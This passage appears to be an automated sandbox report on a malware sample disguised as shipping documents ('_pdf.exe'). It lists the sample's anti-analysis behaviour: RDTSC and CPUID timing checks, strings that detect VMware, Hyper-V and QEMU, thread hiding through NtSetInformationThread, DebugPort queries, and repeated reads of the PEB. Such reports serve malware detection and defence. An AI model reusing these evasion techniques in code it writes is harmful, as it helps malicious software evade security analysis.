      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | RDTSC instruction interceptor: First address: 00000000005680AA second address: 00000000005680AA instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007F0E14EF9E30h 0x0000001f popad 0x00000020 call 00007F0E14EF9839h 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 0000000000C598E4 second address: 0000000000C598EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\wlanext.exe | RDTSC instruction interceptor: First address: 0000000000C59B5E second address: 0000000000C59B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F086A rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe TID: 5736 | Thread sleep count: 190 > 30
      Source: C:\Windows\explorer.exe TID: 1320 | Thread sleep time: -50000s >= -30000s
      Source: C:\Windows\SysWOW64\wlanext.exe TID: 5848 | Thread sleep time: -45000s >= -30000s
      Source: C:\Windows\explorer.exe | Last function: Thread delayed
      Source: C:\Windows\explorer.exe | Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
      Source: explorer.exe, 00000003.00000000.292008725.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000003.00000000.292008725.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
      Source: explorer.exe, 00000003.00000000.290769273.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000003.00000000.291283717.0000000008640000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: Shipping Documents (INV,PL,BL)_pdf.exe | Binary or memory string: rogram Files\Qemu-ga\qemu-ga.exe
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000003.00000002.497929772.00000000055D0000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
      Source: explorer.exe, 00000003.00000000.292008725.000000000871F000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
      Source: explorer.exe, 00000003.00000000.292008725.000000000871F000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000003.00000000.292196573.00000000087D1000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00ices
      Source: explorer.exe, 00000003.00000000.285586778.0000000005603000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: explorer.exe, 00000003.00000000.290769273.0000000008220000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: Shipping Documents (INV,PL,BL)_pdf.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000003.00000000.290769273.0000000008220000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000003.00000000.292008725.000000000871F000.00000004.00000001.sdmp | Binary or memory string: _VMware_SATA_CD00#5&v
      Source: explorer.exe, 00000003.00000002.498066885.0000000005603000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: explorer.exe, 00000003.00000000.290769273.0000000008220000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Process information queried: ProcessInformation

      Anti Debugging:

      Contains functionality to hide a thread from the debugger
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F086A NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Process queried: DebugPort
      Source: C:\Windows\SysWOW64\wlanext.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F086A rdtsc
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F4A77 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F89EB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F421E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F8A85 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F2FAB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F2FB8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F2FFD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F7C4F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F2C7F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F24E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F6CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 0_2_020F89EE mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E46AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E46AE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E46EA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E434257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3AE620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3C3A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3DA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3DA61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E45B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E45B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E478A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A5210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3B8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3AC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3AC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3AC600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3D8E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E461608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3B766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E45FE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E45FEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3DFAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E478ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3DD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3DD294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E43FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3B76E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3D2AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3D16E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E470EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E470EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E470EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E4246A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3D36CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3D2ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3E8EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3DE730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E478B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3CF716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E478F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3DA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3DA70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E47070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe | Code function: 1_2_1E47070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3ADB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BFF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3AF358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3ADB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BEF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4253CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E4253CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D2397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DB390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B8794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E45D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3E37F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E46138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3CDBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E427794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E427794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E427794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E475BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3D002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3BB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E3DBC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E43C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E471074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E462073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 1_2_1E461C06 mov eax, dword ptr fs:[00000030h]
